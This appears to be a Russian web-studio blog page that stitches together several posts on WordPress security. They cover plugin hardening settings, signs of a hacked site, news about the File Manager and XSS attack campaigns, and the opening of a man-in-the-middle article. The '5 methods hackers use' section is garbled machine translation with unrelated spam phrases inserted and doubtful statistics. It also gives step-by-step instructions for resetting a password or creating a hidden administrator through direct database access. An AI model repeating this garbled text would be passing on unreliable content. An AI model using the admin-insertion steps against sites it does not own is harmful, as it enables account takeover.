Вообще, практически вся работа плагина заключается в поднастройке htaccess. То что раньше делалось руками, собирая информацию по защите Вордпресса на разных форумах, теперь несколько автоматизировано. Очень удобно.
Дальше спускаемся ниже и настраиваем модуль, как указано на рисунке.
Обязательно указываем свой IP адрес в белом списке блокировки, нажав кнопку «Add my current IP to the White List».
Оставляем остальное по умолчанию.
Сохраняем результаты и переходим к следующему модулю «Отслеживание ошибки 404«.
Здесь выставьте значения, как указано на рисунке ниже:
Порог ошибок (1) следует уменьшить, когда вы обнаружите, что ваш сайт пытаются взломать «перебором» уязвимости. Если вы уверены, что на вашем сайте нет 404 ошибок (провели технический аудит), то сразу снижайте порог. Чем меньше это значение, тем безопасней, но и тем больше вероятность забанить пользователя, который по непреднамеренной ошибке зашел куда-то ни туда.
Игнорирование типов файлов — это конечно брешь (2) в защите. Так, например, у меня сидел шелл зловреда в .ico файле.
Однако, если вы не делали шаблон сайта под «ретину», не настроили выдачу изображений удвоенной и утроенной плотности всем этим мобильным пользователям с яблочными телефонами и планшетами, то вы их сразу же всех перебаните (см рисунок ниже).
здесь какой- то товарищ с retina — дисплеем мобильного / планшета тщетно пытается запросить картинки удвоенной плотности (@2x.png). Но он обламывается, генерирует 404 ошибку и был бы забанен, если бы не исключения в настройках.
Далее идем в модуль «Заблокированные пользователи«. Выставляем значения следующим образом:
- Включаем «Черный список по умолчанию» — т.е. ставим галочку а поле Включить черный список от сайта HackRepair.com
- Заполняем бан лист, собранными мною за этот месяц IP
Скачать список IP (январь 2018)
Жмите на кнопку выше, копируйте список IP и вставляйте его в поле «Запретить доступ хостам» модуля.
Далее вы ежедневно смотрите логи плагина и пополняйте список новыми IP, с которых вас пытаются взломать. Тут главное не перестараться и не забанить всех подряд, включая IP поисковых систем.
Отбор кандидатов на блокирование имеет следующую логику:
(1) — обращение к плагину, который у меня не установлен. Это, по всей видимости один из скомпрометированных плагинов, имеющих уязвимость. Поиск ведется перебором.
(2) Реферрер подделан — какой то site.ru
(3) Именно этот IP и добавляем в список блокировки. Нажав на него — можем посмотреть с какого прокси пришел этот запрос. Да, всякие индийские и китайские IP блокируем сразу же, всей подсетью, например прописав 67.227.*.* или, что то же-самое, прописав 67.227.0.0/16 — в аннотации CIDR.
Теперь посмотрите на (4). Здесь ищется ads.txt. Как вы знаете, это правила доступа к рекламной сети Google Adsense™. Поэтому данный IP мы блокировать не будем.
Переходим к модулю Local Brute Force Protection. Выставьте настройки, согласно следующего скрина:
Надеюсь, что ваш логин на вход в админку — не admin? Проверьте и поменяйте в настройках пользователя. Впрочем, дальше мы поднастроим так, чтобы входить только с e/mail. Это резко снизит эффектинвность брутфорса админки. С учетом того, что мы перенесли вход в новое место, которое не знают посторонние, брутфорс вам не особо грозит (в отличии от иных методов атаки).
Теперь подключим сетевую защиту. Для этого открываем модуль Network Brute Force Protection, получаем API, прописываем и активируем его. Этот метод защиты похож на методику определения спама Akismet — т.е. если какой то сайт пытались сломать с какого то IP, то он попадает в глобальную базу и если с этого IP попытаются получить доступ к вашему сайту, то он окажется заблокированным.
Переходим к следующему модулю «Тонкая подстройка системы«
Настраиваем модуль, согласно приведенному скрину.
Далее спускаемся чуть ниже и отключаем выполнение PHP в папке Upload. Ибо нечего там выполнять — там должны храниться изображения и/или документы, но никак не исполнимые файлы.
Переходим к последнему значимому блоку — Подстройка WordPress. Здесь включите следующие функции:
- Ссылка для Windows Live Writer
- Ссылка EditURI
- Спам комментарий
- Редактор файлов
- XML-RPC — поставьте в положение «Отключить XML-RPC»
- Множественные попытки авторизации запросом XML-RPC — в положение «Блокировать»
- Сообщения при неудачной попытке входа
- Отключает дополнительные пользовательские архивы
- Login with Email Address or Username — в положение «e/mail address only» — теперь авторизироваться можно будет только по e/mail.
Остальные модули настраивайте по своему усмотрению.
Все работы вы выполняете на свой страх и риск. Обязательно делайте бэкапы сайта.
26
Янв
2018
Посмотрите еще
- Правильный Sitemap.xml для сайта
- Пошаговый аудит контента
- 15 шагов по улучшению качества сайта
Комментарии
Если сайт WordPress взломан, что делать и как проверить?
Ваш сайт ведет себя странно, появился спам или вредоносная реклама?
Или, возможно, вы потеряли доступ к своему сайту WordPress? Или Google заблокировал ваш сайт и он более не доступен в поиске? Если Ваш сайт на WordPress взломан. Как проверить и что делать? Это уже хорошо, потому что Вы точно теперь знаете, что ваш сайт надо лечить и восстанавливать. Большинство владельцев зараженных сайтов даже и не догадываются, что сайт давно является источником вирусов и несет угрозу для каждого, кто его посетит. В мире насчитывается более 18 млн. зараженных сайтов и лишь 15-20% из них попадают в черный список Гугл и блокируются. Остальные продолжают свою работу.
Скорее всего Ваш сайт взломан.
Более того — наверняка это случилось очень давно, так как вирусы и вредоносные программы, попавшие на сайт часто долго дремлют и не показывают своей активности. Хакерам для своих целей и задач — нужно как можно больше одновременно зараженных сайтов. Несколько сайтов с вредоносным кодом не помогут хакерам проводить свои массовые атаки и распространять свой вирус далее по сети.
Да и если Гугл и другие браузеры уже отреагировали на ваш зараженный сайт путем блокировки его, это точный показатель, что заражение сайта произошло довольно давно, потому что поисковой системе нужно не мало времени, чтобы обнаружить вредоносный код на сайте. Хакеры могут здорово навредить вашему бизнесу в интернете, начиная от простой спам-рекламы до перенаправления ваших пользователей на другие небезопасные ресурсы.
После обнаружения чего, Гугл отправит Ваш сайт в черный список и заблокирует его показ в поиске. При переходе на сайт браузер будет блокировать вход, выдавая предупреждение об опасности, а провайдер хостинга вышлет вам предупреждение и ограничит доступ к сайту до полного удаления вредоносного кода. Даже если у вас подключен SSL сертификат и сайт работает через HTTS.
Что необходимо сделать чтобы вылечить свой сайт?
Первое — перестать нервничать) — Ваш сайт можно вылечить. Начнем с обычной, более точной проверки сайта на взлом и наличие вирусов.
Как проверить, что мой сайт взломан?
Начнем с признаков взлома сайта:
- — Появились всплывающие окна на сайте, которые не были созданы вами или вашей командой.
- — Ваш сайт перенаправляет пользователей на другой вам неизвестный сайт.
- — Спам-реклама на вашем веб-сайте с контентом для взрослых, наркотиками, азартными играми или другой любой незаконной деятельностью.
- — Ваш сайт ранжируется по ключевым словам спама в Google Analytics или другом инструменте аналитики.
- — Ваши посетители блокируются в браузере с предупреждением от Google: «Сайт содержит вредоносное ПО”
- — Вы получили электронное письмо от вашего веб-хостинга, что на вашем сайте присутствует вредоносный код.
Эти признаки указывают на взлом, хотя надо признаться, что иногда это бывает ложной тревогой. Поэтому обязательно необходимо убедится в этом и тщательно проверить сайт.
Хороший онлайн сканер автоматически показывает вредоносный код. Самый сложный и рискованный способ проверки сайта WordPress, — это сделать ручную проверку. Это опасно, потому что вы будете взаимодействовать с файлами и папками WordPress. Способы, как проверить взломан ли ваш сайт:
1. Сканирование вашего сайта с помощью сканера вредоносных программОдин вариантов сканеров — MalCare — сканер вредоносных программ.
- — Установить плагин безопасности MalCare на свой веб-сайт.
- — Затем в панели инструментов вашего сайта (в админке) выберите MalCare .
- — На странице MalCare введите URL-адрес веб-сайта и бесплатно запустите сканирование на наличие вредоносных программ. Если он обнаружит, что ваш сайт взломан, вы получите уведомление с количеством и месторасположением найденных зараженных файлов.
Поисковая консоль Google помогает отслеживать трафик и производительность вашего веб-сайта. Он также предупреждает вас, если обнаружит какие-либо проблемы безопасности на вашем сайте. Это означает, что если на вашем сайте есть вредоносная программа, консоль поиска обнаружит ее. Что нужно сделать:
- — Войдите в свою учетную запись Google Search Console .
- — В меню слева выберите пункт «Вопросы безопасности» .
- — Если ваш сайт взломан, вы увидите предупреждение о том, что на сайте обнаружено нежелательное программное обеспечение . Очень важно: вам необходимо настроить консоль поиска Google, чтобы она могла обнаруживать проблемы с безопасностью. Для этого необходимо, если Вы еще не делали этого пройти этап подтверждения владения сайтом.
Вставьте адрес своего сайта (домен) WordPress в инструмент безопасного просмотра Google, и он покажет вам проблемы, обнаруженные на сайте, если такие есть. Инструмент довольно надежный, потому это от самого Google. Он проверит ваш сайт на наличие вредоносных программ и, обнаружив, сообщит вам об этом.
4. Проверьте предупреждения от провайдеров хостинга, поисковых систем и браузеров.Если ваш сайт WordPress взломан (и вы не знаете что делать и как проверить), вполне вероятно, что вы получили предупреждающие письма или уведомления от вашего хостинг-провайдера. Поисковые системы и интернет-браузеры, такие как Google, Yahoo и Bing, также будут отображать предупреждающие сообщения на вашем сайте и в результатах поиска, чтобы предупредить посетителей о том, что ваш сайт взломан. То есть Вы потеряете свои показатели в поисковой выдаче и ваш сайт может полностью исчезнуть на время с поиска Google.
Хостинг провайдерХостинг-провайдеры обслуживают тысячи сайтов. Чтобы обеспечить безопасность своей платформы, они сканируют все веб-сайты, которые они размещают, на необходимость поиска возможных вредоносных действий. Один взломанный веб-сайт может негативно повлиять на другие веб-сайты на платформе хостинга и поставить под угрозу целый бизнес провайдера.
Поэтому, когда они обнаруживают взломанный веб-сайт, они немедленно приостанавливают учетную запись хостинга и выдают владельцу сайта уведомление об исправлении веб-сайта. Чтобы узнать, обнаружил ли ваш хостинг-провайдер взлом, проверьте свою электронную почту или уведомления на панели управления вашей учетной записью в кабинете провайдера в своей учетной записи.
Как и хостинг провайдеры, поисковые системы также регулярно сканируют сайты на наличие вредоносных программ. Обнаружив взломанный сайт, они заносят его в черный список и ограничивают пользователям просмотр сайта. Взломанные сайты подвергают своих пользователей риску, заставляют их загружать вредоносное программное обеспечение или делиться своей конфиденциальной информацией. Примерно так будет выглядеть страница в браузере для пользователя, который пытается открыть зараженный сайт.
Чтобы узнать, находится ли ваш сайт в черном списке, вам нужно:
— откройте браузер в режиме инкогнито и откройте https://www.google.com/.
— затем поместите адрес своего сайта (домен) в поиск Google и нажмите Enter
— перейдите по любой ссылке, которую вы увидели в результатах поиска, которая ведет на одну из ваших страниц сайта. Не забудьте перед этим выйти из админ панели Вашего сайта.
- — Сайт содержит вредоносное ПО
- — Опасность фишинговой атаки
- — Вы посещаете фишинговый сайт
Если сайт в черном списке — это верный признак взломанного сайта.
Интернет браузерыКак и веб-хостинг поисковые системы, интернет-браузеры также заинтересованы в защите своих пользователей. Если они обнаруживают взломанный сайт, они пытаются запретить пользователям посещать сайт. Они делают это, отображая предупреждения в результатах поиска. Например, в Google Chrome вы увидите такое предупреждение: «Этот сайт возможно был взломан» или «Этот сайт может нанести вред вашему компьютеру»
5. Вручную изучить зараженные файлы (опасно)Когда хакеры проникают на ваш сайт, они вносят изменения на вашем сайте. Чаще всего они пытаются сделать это так, чтобы не быть обнаруженными, чтобы они могли и далее продолжать использовать ресурсы вашего сайта в течение длительного времени. Они прячут вредоносные программы в местах, где вы вряд ли сможете их найти, таких как критические файлы WordPress, с которыми обычно никто не хочет возиться. Если ваш сайт взломан, есть большая вероятность, что хакер спрятал вредоносное ПО в таких файлах. Их изучение поможет вам выяснить, действительно ли ваш сайт взломан.
Но будьте осторожны. Обработка важных файлов WordPress — дело рискованное. Одна ошибка может сломать весь ваш сайт, поэтому сохраните резервную копию сайта перед этим (часто такая возможность есть в вашем личном кабинете хостинга). Мы рекомендуем вам пропустить этот метод, если вы не разработчик или не разбираетесь во внутренней работе CMS WordPress.
Какие файлы и папки требуют особого внимания:
— папка плагинов и тем
— htaccess
— wp-config
Откройте эти файлы и найдите ключевые слова в них, такие как, например «eval» или «base64_decode», они часто являются частью вредоносного ПО.
Как исправить взломанный сайт
Теперь, когда вы обнаружили, что ваш сайт взломан, его необходимо почистить и вылечить. Чем дольше ваш сайт будет взломан, тем больше будет ущерб.
Существуют различные способы очистки вашего сайта, однако мы рассмотрели только самый эффективный способ — использование плагина безопасности для CMS WordPress. Это один из самых простых и надежных способов для обычного пользователя.
Один из плагинов — удаление вредоносных программ MalCare, способный очистить сайт от вирусов за 5 минут.
Что нужно сделать:
— просканировать сайт на наличие вирусов или вредоносного кода. Плагин сделает это автоматически перед установкой.
— после найдите кнопку “Автоочистка”
— после обновления MalCare немедленно начнет чистку вашего сайта.
Очистка вашего сайта — это всего лишь половина работы. После вам необходимо выявить и устранить уязвимости, которые позволили хакерам взломать ваш сайт и заразить его. А поиск уязвимостей часто лучше доверить профессионалам в кибербезопасности, так как обычному пользователю будет просто недостаточно навыков и знаний для этого. Например заказать услугу круглосуточной защиты сайта от Datami.ua
Существует два распространенных типа уязвимостей, которые вызывают взлом.
Первый — это уязвимые плагины и темы, слабые учетные данные .
Что нужно сделать: обновить или удалить уязвимые плагины и темы. Устаревшие плагины и темы могут быть уязвимы и могут быть использованы для проникновения на ваш сайт. Поэтому мы рекомендуем вам обновить все устаревшее программное обеспечение, которое включает в себя не только плагины и темы, но и целое ядро WordPress . Если вы используете пиратские темы и плагины (обычно взломанные кем-то когда-то и непонятно где), мы настоятельно рекомендуем деактивировать и удалить их со своего веб-сайта.
Пиратское программное обеспечение обычно заражено вредоносным ПО, которое при установке на веб-сайте WordPress позволяет хакерам получить доступ к вашему сайту.
Второй: используйте надежное имя пользователя и пароль
Один из самых распространенных методов взлома веб-сайтов хакерами — это атаки методом «грубой силы» . В этом типе атаки они используют ботов, чтобы попытаться угадать правильную комбинацию имен пользователей и паролей, чтобы получить доступ к вашему сайту. Сайты с легко угадываемыми именами пользователей (например, admin, John, user и т. Д.) И паролями (например, password123, admin1234, user1234) легко взломать за несколько минут.
Как удалить сайт из черного списка Google и возобновить хостингЕсли ваш веб-сайт занесен в черный список, вы должны сообщить Google, что вы очистили свой веб-сайт, чтобы они могли приступить к удалению из черного списка. Вам нужно будет отправить сайт на проверку и наше руководство по удалению черного списка Google , который поможет вам в этом.
И если ваш сайт приостановлен, вам нужно будет связаться с вашим хостинг-провайдером и сообщить им, что вы очистили свой сайт. Они проверят, так ли это на самом деле.
После того, как вы предприняли все вышеперечисленные шаги по исправлению вашего сайта, осталось сделать только одну очень важную вещь. Вы должны убедиться, что ваш сайт никогда более не будет взломан.
Защитите свой сайт от взлома
Чтобы защитить сайт WordPress от будущих попыток взлома, мы настоятельно рекомендуем вам установить плагин безопасности WordPress, который выполняет 3 основных задачи: сканирование, очистка и защита веб-сайта. Если вы установите плагин безопасности на свой сайт, он будет сканировать ваш сайт каждый день и очищать его. Если ваш сайт взломан — принимать меры для защиты вашего сайта от попыток взлома в будущем. Вы можете выбрать плагин безопасности сайта из нашего списка из лучших WordPress плагин безопасности.
Со временем каждая тема или плагин получают уязвимости WordPress . Чтобы исправить это, разработчики быстро выпускают новые обновления, чтобы устранить уязвимости. Поэтому своевременное обновления крайне важно для безопасности сайта. Узнайте, как безопасно обновить ваш сайт .
Скачивать темы и плагины только с доверенных сайтовМногие используют пиратские темы и плагины. Потому что это бесплатно, но в конце концов это будет дороже.
Большинство пиратских плагинов или тем содержат вредоносные программы. Поэтому, когда вы устанавливаете и активируете пиратское программное обеспечение на своем веб-сайте, вредоносное ПО также активируется вместе с ним. Вредоносный код действует как бэкдор, который дает хакерам доступ к вашему сайту. Более того, пиратское (взломанное) программное обеспечение для WordPress не получает обновлений от разработчиков. Когда в программном обеспечении обнаруживается уязвимость, без его обновления невозможно исправить программное обеспечение. А ПО не обновляется. Лучше всего избегать использования пиратских тем WordPress и плагинов на вашем сайте. Используйте плагины и темы только с официального сайта WordPress или надежных торговых площадок, таких как ThemeForest, CodeCanyon, Evanto и др.
- Дополнительная внутренняя защита сайта
WordPress рекомендует принять определенные меры для усиления безопасности вашего сайта. Для реализации этих мер вам необходимо иметь технические знания для работы с WordPress. Работа со взломанным сайтом — это дорого, долго и очень затратно по времени. Важно обеспечить меры безопасности на вашем сайте до того, как его могут взломать. Один из лучших способов сделать это — подключить круглосуточную защиту сайта от всех возможных угроз. Он сканирует ваш сайт ежедневно и предупреждает вас, когда обнаруживает подозрительные действия на вашем сайте.
- Ваш Datami.ua.
5 МЕТОДОВ, КОТОРЫЕ ХАКЕРЫ ИСПОЛЬЗУЮТ ДЛЯ ВЗЛОМА САЙТА WORDPRESS
5 методов, которые хакеры используют для взлома сайта WordPress ***
Оставьте ответ
Есть много способов, которыми хакеры могут повлиять на любой бизнес, например, кража личных данных, контроль вашего компьютера, принудительное закрытие вашего сайта и т. Д. Безопасность веб-приложений в глобальном масштабе и в Индии всегда существует, как и раньше, но хакеры получают опыт в целом новый уровень, позволяющий им взломать любой веб-сайт и, следовательно, разрушить их бизнес. Теперь мы могли только представить, как владельцы бизнеса ненавидят попадать в такую непростую ситуацию. Для крупного бизнеса, у которого есть команда веб-безопасности, проблема может быть решена с помощью эффективной командной работы, но для малого бизнеса, имеющего сайты WordPress, решение сводится к вам.
**
Как это влияет на сайты WordPress? **
Основным фактом является то, что многие малые, средние и даже крупные компании используют WordPress для создания своих веб-сайтов. Это дает хакерам возможность взломать любой бизнес, взломав их сайты WordPress. Более того, существует множество способов взлома сайта WordPress, поэтому нет единственного способа предотвратить их взлом. Судя по данным опроса, проведенного еще в 2012 году, около 40 процентов сайтов WordPress подвержены взлому, что составляет почти 170 000 пользователей. К настоящему времени это число, несомненно, увеличилось в разы. По этой причине пользователи WordPress должны знать об общих методах, используемых для взлома сайтов WordPress, потому что только когда вы изучите эти методы, вы сможете найти способы противодействия им. Вот 5 методов о том, как взломать сайт WordPress?
где купить решетку
1. Использование MySQL
Хакеры используют этот метод для создания новой учетной записи или изменения пароля любого существующего пользователя на веб-сайте. Все, что им нужно, — это доступ к cPanel или прямой доступ MySQL к базе данных веб-сайта. Самый частый случай — смена пароля существующего пользователя. Хакеры входят в систему через cPanel, где слева они получают список таблиц и баз данных. Они ищут таблицу с окончанием _users. Чтобы найти правильную таблицу, нужно приложить немало усилий. Как только он будет найден, он должен содержать конкретного пользователя, которого хакеры хотят отредактировать. Как только пользователь найден, он может легко изменить пароль, который сохраняется в поле user_pass. Они меняют пароль путем хеширования при реализации алгоритма MD5. Просто откройте генератор MD5, введите пароль по вашему выбору и нажмите хэш. Затем исходный пароль заменяется сгенерированной строкой.
расширение chrome войти на сайт
В случае создания нового пользователя хакеру придется столкнуться с некоторыми сложностями, но все они будут решены в течение минуты. Им просто нужно перейти к созданию новой опции записи в таблице пользователей и заполнить такие поля, как user_pas, user_login, user_email и т. Д. Остальные поля не являются обязательными и, следовательно, могут оставаться пустыми. После сохранения новой записи MySQL сгенерирует уникальный идентификатор, который фактически является числом в поле идентификатора. Это число необходимо иметь в виду. Теперь они переходят в таблицу usermeta с тем же префиксом, что и в предыдущей таблице. Необходимо создать две новые записи. Затем необходимо установить user_id в качестве уникального идентификатора, который был сгенерирован ранее. Для первой записи meta_key устанавливается на wpct_user_level, а затем устанавливается значение 10. В случае второй записи один meta_key должен быть установлен на wpct_capabilities с meta_value a: 1: {s: 13: administrator; b : 1;}. Затем просто сохраните его, и все готово.
2. functions.php
Есть два способа подойти к этому: во-первых, отредактировав файл funtions.php через cPanel, а во-вторых, используя для этого FTP-клиент. Используя cPanel, хакеры открывают файловый менеджер и находят папку с активной темой. Оттуда он должен перейти в папку public_html / wp_content / themes и найти тему. Затем все, что ему нужно сделать, это открыть его папку и отредактировать functions.php. Затем код должен быть добавлен перед закрывающим тегом, и взлом завершен. Не забудьте также изменить пароль. После создания новой учетной записи хакеры удалят код из файла functions.php.
Вы можете узнать, как этот метод и некоторые другие методы взлома веб-сайта WordPress используются на HiTechThreats.com .
мега меню начальной загрузки 4
3. Другие методы взлома
Когда вы знаете пароль cPanel, MySQL или FTP, тогда будет доказано, что у вас есть законный доступ к серверу и, следовательно, вы также можете получить доступ к установкам WordPress. Когда у вас есть одна из этих учетных записей, она бесполезна для хакеров.
4. Создание бэкдора
Когда хакеры обнаруживают, что входная дверь закрыта, они пытаются получить доступ через черный ход. Это действительно похоже на злонамеренный способ использования кода для входа на сайт и управления им, но иногда даже владельцы сайтов используют этот метод для управления своим сайтом. Бывают случаи, когда входная дверь не будет открыта для хакеров, чтобы получить доступ к вашему сайту WordPress, но тогда бэкдор может быть уязвим, и хакеры попытаются получить к нему доступ напрямую. Обычно это происходит, когда за вашей средой WordPress спрятан фрагмент кода, а затем хакеры могут получить доступ к сайту WordPress с правами администратора. Эту информацию можно удалить, а резервные копии можно восстановить тысячу раз, но чаще всего владелец ничего не знает о входах через бэкдор.
5. Создание новых пользователей через FTP.
Когда HTTP станет недоступным для хакеров, они попытаются получить доступ к FTP-серверу и создать новые права администратора. Чтобы создать учетную запись вне среды администратора WordPress, хакерам нужен только FTP-доступ к сайту. Как администратор, он будет иметь всю необходимую информацию для входа на сервер и, следовательно, для создания новых учетных записей пользователей путем создания новой функции с использованием вашей темы.
#wp #wordpress #website #security #hack
Взлом WordPress. Атаки хакеров 2020 новые данные от xakep.ru
По информации от xakep.ru в плагине File Manager, которым пользуются более 700 000 ресурсов на базе WordPress, обнаружена опасная уязвимость, которая позволяет выполнять команды и вредоносные скрипты на уязвимых сайтах. Спустя всего несколько часов после раскрытия информации о баге эксперты из таиландской компании NinTechNet сообщили о первых атаках на эту уязвимость.
Суть проблемы заключается в том, что плагин содержит дополнительный файловый менеджер, известный как elFinder — это библиотека с открытым исходным кодом, которая обеспечивает работу основных функций плагина, а также предоставляет пользовательский интерфейс. Уязвимость возникает из-за того, как реализована имплементация elFinder в данном случае.
Так, в File Manager расширение файла библиотеки connector.minimal.php.dist изменено на .php, чтобы его можно было запускать напрямую, даже если файл connector не используется самим файловым менеджером. В такие библиотеки часто включены файлы примеров, которые не предназначены для использования прямо «из коробки», без настройки управления доступом. В итоге данный файл не имеет прямых ограничений доступа, а значит, к нему может получить доступ кто угодно.
Исследователи NinTechNet пишут, что злоумышленники используют эксплоит для загрузки на сайты файлов изображений, в которых скрытых веб-шеллы. В итоге атакующие могут использовать удобный интерфейс, который позволяет им запускать команды в каталоге plugins/wp-file-manager/lib/files/, где находится плагин File Manager. И хотя проблема не позволяет хакерам выполнять команды вне названного каталога, атакующие могут нанести немалый ущерб, загрузив на уязвимый сайт скрипты, которые способны выполнять действия в других частях уязвимого ресурса.
Не пропустите нашу новую публикацию, она поможет вам глубже изучить вопрос безопасности: Разбираемся, движок WordPress безопасен или нет?
По данным NinTechNet, в настоящее время хакеры используют баг для загрузки на сайты скрипта hardfork. php, а затем применяют его инъекций кода в скрипты /wp-admin/admin-ajax.php и /wp-includes/user.php. При этом отмечается, что злоумышленники стремятся защитить уязвимый файл паролем (connector.minimal.php), чтобы другие хак-группы не могли воспользоваться уязвимостью на уже зараженных сайтах.
«В ближайшие несколько часов или дней мы увидим, что именно они будут делать дальше. Ведь если они защищают уязвимый файл паролем, чтобы предотвратить использование уязвимости другими хакерами, вероятно, они собираются вернуться и снова посетить зараженные ресурсы», — говорят специалисты NinTechNet.
Эксперты из ИБ-компании Wordfence уже посвятили этой волне атак собственный отчет. За последние несколько дней компания заблокировала более 450 000 попыток эксплуатации данной уязвимости. Исследователи пишут, что злоумышленники пытаются внедрить на сайты различные файлы. В некоторых случаях эти файлы были пустыми (очевидно, хакеры лишь тестировали уязвимость), другие вредоносные файлы носили имена hardfork. php, hardfind.php и x.php.
«Плагин файлового менеджера, подобный этому, позволяет злоумышленникам манипулировать файлами и загружать новые по своему выбору прямо из панели управления WordPress. Потенциально это также позволяет сразу повысить привилегии.
Например, злоумышленник может получить доступ к админке сайта, используя скомпрометированный пароль, затем получить доступ к уязвимому плагину и загрузить веб-шелл, чтобы выполнить дальнейшие действия на сервере и развить свою атаку с помощью другого эксплоита», — пишет специалистка Wordfence Хлоя Чемберленд (Chloe Chamberland).
Проблема уже была исправлена в File Manager версий от 6.0 до 6.8. Официальная статистика WordPress показывает, что в настоящее время уязвимы примерно 52% установок плагина, то есть около 350 000 сайтов.
Не пропустите эту информацию — это действительно важно: Что делать если ваш сайт на WordPress испытывает техническую проблему?
Атаки хакеров начались 28 апреля 2020
Как сообщает эксперт по информационной безопасности компании Akamai Ларри Кэшдоллар (Larry Cashdollar) продолжается атака перебором паролей против WordPress, MySQL. Виредонос Stealthworker, активно используется для брутфорс-атак (перебором паролей) на популярные онлайн платформы.
Среди потенциальных объектов атак — сайты на WordPress, а так же Drupal, Bitrix, OpenCart, Magento и службы MySQL, PostgreSQL, SSH и FTP. Более ранние версии также атаковали phpMyAdmin.
Stealthworker попал в одну из специальных ловушек (Honeypot), которая представляет собой установку WordPress с легко угадываемым административным паролем. Ждать атак долго не пришлось: после успешного взлома злоумышленники установили в систему новую тему WordPressAlternateLite. Кроме нее, обнаружился двоичный процесс, работающий как www-user и резко вырос сетевой трафик.
AlternateLite— одна из множества бесплатных тем WordPress, установленная более чем на 1000 сайтов. Stealthworker — не первый и явно не последний инструмент подобного рода. Если он продемонстрирует эффективность выше среднего, скорее всего, количество подобных ему вредоносов будет расти, говорит Михаил Зайцев, эксперт по информационной безопасности
Хотим поделиться с вами ценной информацией, узнайте, какие 10 лучших плагинов безопасности WordPress мы применяем для защиты сайтов
Не ждите когда вас взломают!
Закажите апгрейд вашего сайта на WordPress прямо сейчас!
Оставить заявкуНовость от cnews.
ru на 28 мая: уже миллион сайтов на WordPress атакован с 24 тыс. IP-адресовЗлоумышленники ведут серийный «обстрел» сайтов на базе WordPress в надежде найти и скомпрометировать уязвимые. В прицеле – старые, давно не обновлявшиеся плагины с XSS-уязвимостями.
Хакеры пытаются перенаправить пользователей на сторонние вредоносные ресурсы или подсадить бэкдор. Атаки осуществлялись как минимум с 24 тыс. адресов. Атаки начались 28 апреля 2020 г.; к 3 мая количество предпринятых попыток атаковать сайты на WordPress перевалило за 20 млн.
«Вероятнее всего, злоумышленники ведут «ковровую бомбардировку» в надежде зацепить уязвимый ресурс, — говорит Алексей Водясов, эксперт по информационной безопасности компании SEC Consult Services. — КПД у этой кампании вряд ли очень высокий: как видно, не так много сайтов содержат уязвимые плагины. Хотя нельзя исключать, что вышеприведенным списком мишени не ограничиваются. В любом случае, администраторам ресурсов рекомендуется произвести у себя весеннюю уборку, обновить все плагины и избавиться от не поддерживаемых».
Если вы заметили, что ваш сайт взломали, значит ему нужна Надежная защита и обслуживание сайта на WordPress, обращайтесь в веб-студию АВАНЗЕТ, будем рады помочь. Для защиты сайтов наших клиентом мы применяем 10 лучших плагинов безопасности WordPress
Информация от xakep.ru на 28 апреля:
Специалисты Wordfence обратили внимание, что некая хак-группа развернула масштабную кампанию против сайтов на WordPress. Используя различные известные уязвимости, злоумышленники предприняли попытки атак на почти миллион ресурсов за прошедшую неделю.
Атаки начались 28 апреля 2020 года и привели к тридцатикратному увеличению объема вредоносного трафика, отслеживаемого компанией. Группировка использует для атак более 24 000 различных IP-адресов и уже попыталась взломать более 900 000 сайтов под управлением WordPress. Атаки достигли своего пика в прошлое воскресенье, 3 мая 2020 года, когда хакеры предприняли более 20 000 000 попыток взлома 500 000 различных доменов.
Ценные рекомендации в новой статье: Надежная защита и обслуживание сайта на WordPress
Исследователи пишут, что в основном группировка полагается на эксплуатацию разнообразных XSS-уязвимостей и с их помощью внедряет вредоносный JavaScript-код на сайты, а затем перенаправляет входящий трафик ресурсов на вредоносные сайты. Также используемая злоумышленниками малварь проверяет, не вошел ли посетитель как администратор, чтобы с помощью его учетной записи попытаться автоматически создать бэкдор.
Wordfence рассказывает, что злоумышленники применяют в своей кампании следующие уязвимости:
- XSS-уязвимость в плагине Easy2Map, который был удален из репозитория WordPress еще в августе 2019 года. Попытки эксплуатации этой уязвимости составляют более половины от общего числа атак, хотя плагин установлен менее чем на 3000 сайтах;
- Уязвимость XSS в плагине Blog Designer, которая была исправлена в 2019. Данные плагин используется примерно 1000 ресурсов, но эта уязвимость уже использовалась в ходе других вредоносных кампаний;
- Баг в плагине WP GDPR Compliance, исправленный в конце 2018 года. Помимо прочего, проблема позволяла злоумышленникам изменять домашний URL сайта. Хотя данный плагин насчитывает более 100 000 установок, аналитики подсчитали, что в настоящее время лишь 5000 из них по-прежнему уязвимы.
- Уязвимость в плаигне Total Donations, позволяющая изменять домашний URL сайта. Данный плагин был удален с Envato Marketplace в начале 2019 года, и в настоящее время насчитывается менее 1000 «живых» установок.
- XSS-уязвимость в теме Newspaper, которая была исправлена в далеком 2016 году. В прошлом эту проблему тоже эксплуатировали хакеры.
Также, по мнению экспертов Wordfence, в будущем стоящая за атаками группировка может разработать новые эксплоиты и расширить свой арсенал, что повлечет за собой атаки и на другие уязвимости на сайты на WordPress.
Источник: xakep.ru
Вашему сайту требуется поддержка, обслуживание, хостинг?
Напишите нам прямо сейчас, всегда рады помочь!
Оставить заявку← Поделиться с друзьями !
Взлом WordPress с помощью атак «Человек посередине»
Подробное объяснение того, как злоумышленники используют «Человек посередине» (MitM) для взлома веб-сайтов WordPress и учетных данных для входа. Эта статья предназначена только для образовательных целей.
Как и любое другое веб-приложение с формой входа, WordPress отправляет ваше имя пользователя и пароль в HTTP-запросе при входе в систему. По умолчанию HTTP не является зашифрованным протоколом. Это означает, что если ваш веб-сайт WordPress не использует HTTPS, связь между вами и веб-сервером может быть перехвачена.
Хакеры со злым умыслом могут легко перехватить и изменить открытый (незашифрованный) HTTP-трафик вашего веб-сайта WordPress. Естественно, одной из самых интересных частей информации для злоумышленника будут ваши учетные данные администратора WordPress.
Программное обеспечение, используемое для проведения атак типа «человек посередине» (MitM), свободно и широко доступно. В этой статье будут рассмотрены некоторые реальные примеры того, как MitM можно использовать для управления вашим веб-сайтом WordPress. Затем он рекомендует, как лучше всего защититься от них.
Что такое атака «человек посередине» (MitM)?
Атака «человек посередине» (MitM) — это общий термин для атак, при которых хакер позиционирует себя как посредник между отправителем и получателем. Например, между вашим браузером и веб-сайтом, который вы посещаете. Это позволяет злоумышленнику подслушивать, а во многих случаях также изменять содержимое по мере его отправки и получения между двумя сторонами. В большинстве случаев, если они захватят учетные данные, они смогут войти в систему и взломать ваш сайт WordPress.
Как злоумышленнику попасть в середину?
